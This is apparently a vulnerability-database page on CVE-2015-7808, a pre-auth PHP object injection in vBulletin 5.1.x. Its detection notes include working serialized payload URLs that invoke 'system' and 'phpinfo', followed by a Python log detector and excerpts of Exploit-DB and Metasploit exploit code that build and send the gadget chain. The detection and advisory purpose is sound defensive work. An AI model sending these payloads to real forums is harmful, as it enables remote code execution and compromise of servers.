CVE-2015-7808
Published: 2015-11-24
Priority: P2 · 79 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 80.64% (99.6th percentile)
The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | — | — |
Detection & IOCs
- url: `/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}`
- url: `http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D`
- bytes: `O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database"`
- bytes: `O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D`
- Detect GET requests to the vBulletin endpoint /ajax/api/hook/decodeArguments whose 'arguments' parameter contains a PHP serialized object (starting with 'O:' or the URL-encoded equivalent 'O%3A'). This is the sole attack vector for this CVE.
- The serialized payload uses the class chain vB_dB_Result containing a nested vB_Database object whose 'functions' array maps 'free_result' to a callable function name (e.g., 'system', 'phpinfo'). Alert on these class names in the arguments parameter.
- Canary/beacon detection: the exploit sends echo $((0xfee10000)) and checks for the response value 4276158464 to confirm code execution before issuing further commands.
- Two distinct gadget chains are used depending on the vBulletin version: vB_Database for 5.0.X and vB_Database_MySQLi for 5.1.X. Monitor for both class names in the arguments parameter.
- The attack is unauthenticated (pre-auth). No session cookie or authentication token is required to exploit the endpoint.
- Affected versions are strictly vBulletin 5 Connect 5.1.2 through 5.1.9 (and 5.0.X per Metasploit targeting). Versions outside this range are not confirmed vulnerable.
- The exploit payload treats double-quote (0x22) as a bad character; URL-encoding of the serialized object is required for reliable delivery via the GET arguments parameter.
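The request checks from the notes above, written as a log-triage function. This is an added example, not code from any of the quoted sources; the access-log format, helper names and sample lines are constructed, and the sample payloads are truncated after the class names.

```python
import re
from urllib.parse import unquote

ENDPOINT = "/ajax/api/hook/decodeArguments"
# Gadget class names taken from the detection notes above.
GADGET_CLASSES = {"vB_dB_Result", "vB_Database", "vB_Database_MySQLi"}
REQUEST_RE = re.compile(r'"GET (\S+) HTTP/[\d.]+"')
ARGS_RE = re.compile(r'[?&]arguments=([^&\s]*)')
OBJECT_RE = re.compile(r'O:\d+:"(\w+)"')  # PHP serialized object header
CANARY = "0xfee10000"                     # probe string from the notes above

def fully_unquote(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded payloads (O%253A) still match."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding dict for a suspicious access-log line, else None."""
    req = REQUEST_RE.search(line)
    if not req:
        return None
    path, _, query = req.group(1).partition("?")
    arg = ARGS_RE.search("?" + query) if path.endswith(ENDPOINT) else None
    if not arg:
        return None
    decoded = fully_unquote(arg.group(1))
    classes = OBJECT_RE.findall(decoded)
    if not classes:
        return None  # endpoint was hit, but without a serialized object
    return {"classes": classes,
            "known_gadget": bool(GADGET_CLASSES & set(classes)),
            "canary": CANARY in decoded}

# Constructed sample lines (combined log format assumed), payloads truncated.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Nov/2015:10:00:00 +0000] "GET /forum/index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [05/Nov/2015:10:00:01 +0000] "GET /vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22 HTTP/1.1" 200 0',
    '203.0.113.9 - - [05/Nov/2015:10:00:02 +0000] "GET /ajax/api/hook/decodeArguments?arguments=O%253A12%253A%2522vB_dB_Result%2522%253BO%253A18%253A%2522vB_Database_MySQLi%2522%2520echo%2520%2524((0xfee10000)) HTTP/1.1" 200 11',
    '203.0.113.7 - - [05/Nov/2015:10:00:03 +0000] "GET /ajax/api/hook/decodeArguments?arguments=a%3A0%3A%7B%7D HTTP/1.1" 200 2',
]

def scan(lines):
    """Return (line_index, finding) pairs for every flagged line."""
    return [(i, f) for i, line in enumerate(lines) if (f := inspect_line(line))]
```

A finding with `known_gadget` false is still worth review, since any serialized object reaching this endpoint is unexpected.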
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck · 7.5 HIGH
GHSA
ghsa_unreviewed·2022-05-17
CVE-2015-7808 [HIGH] CWE-20 GHSA-rj4h-h9j2-p4h7: The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5
VulnCheck
vBulletin vBulletin Improper Input Validation
vulncheck·2015·CVSS 7.5
CVE-2015-7808 [HIGH] vBulletin vBulletin Improper Input Validation
Affected: vBulletin vBulletin
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/
Exploit PoC: https://vulncheck.com/xdb/3e4e7524deca
No detection rules found.
Exploit-DB
vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)
exploitdb·2017-07-24
CVE-2015-7808 vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)
```ruby
      'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',
      'Description' => %q{
        This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
      },
      'Platform' => 'php',
      'License' => MSF_LICENSE,
      'Author' => [
        'Netanel Rubin', # reported by
        'cutz', # original exploit
        'Julien (jvoisin) Voisin', # metasploit module
      ],
      'Payload' =>
        {
          'BadChars' => "\x22",
        },
      'References' =>
        [
          ['CVE', '2015-7808'],
          ['EDB', '38629'],
          ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
          ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
        ],
      'Arch' => ARCH_PHP,
      'Targets' => [
        [ 'Automatic Targeting', { 'auto' => true } ],
        ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
        ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}
```
Exploit-DB
vBulletin 5.x - Remote Code Execution
exploitdb·2015-11-23
CVE-2015-7808 vBulletin 5.x - Remote Code Execution
---
```perl
#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/reza.espargham
# Special Thanks : Mohammad Emad
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?
```
Exploit-DB
vBulletin 5.1.x - Remote Code Execution
exploitdb·2015-11-05
CVE-2015-7808 vBulletin 5.1.x - Remote Code Execution
---
```sh
# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE :
# I did not discover this exploit, leaked from the IoT.
# Build the object
php << 'eof'
<?php
class vB_Database {
    public $functions = array();
    public function __construct()
    {
        $this->functions['free_result'] = 'phpinfo';
    }
}
class vB_dB_Result {
    protected $db;
    protected $recordset;
    public function __construct()
    {
        $this->db = new vB_Database();
        $this->recordset = 1;
    }
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
```
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00
Metasploit
vBulletin 5.1.2 Unserialize Code Execution
metasploit
This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Authors: Lei Xu, Yue Guan, Vaibhav Singhal. Published: April 12, 2021.
Qualys
Hackers Are Having a Field Day with Stolen Credentials
blogs_qualys·2017-01-10
Hackers Are Having a Field Day with Stolen Credentials
Login credentials have always been a weak link in cybersecurity’s protection chain, a situation that’s worsening. However, this trend could be reversed with a bit of effort from end users, website owners and software vendors.
## 2016: The Year of Stolen Credentials
Hackers made hay of the sorry state of credential security in 2016. They stole millions of username and password combinations from online services of all shapes and sizes. Blogs and discussion forums were hit particularly hard.
Exploiting credentials is an old attack vector that still works wonders for hackers. In its 2016 Data Breach Investigations Report (DBIR), Verizon added a section about credentials, revealing that 63% of data breaches involved weak, default or stolen passwords.
“This statistic drives our recommendatio
Greynoiseio
NoiseLetter April 2024
blogs_greynoiseio
- http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/
- http://packetstormsecurity.com/files/134331/vBulletin-5.1.2-Unserialize-Code-Execution.html
- http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq
- http://www.rapid7.com/db/modules/exploit/multi/http/vbulletin_unserialize
- https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html
- https://www.exploit-db.com/exploits/38629/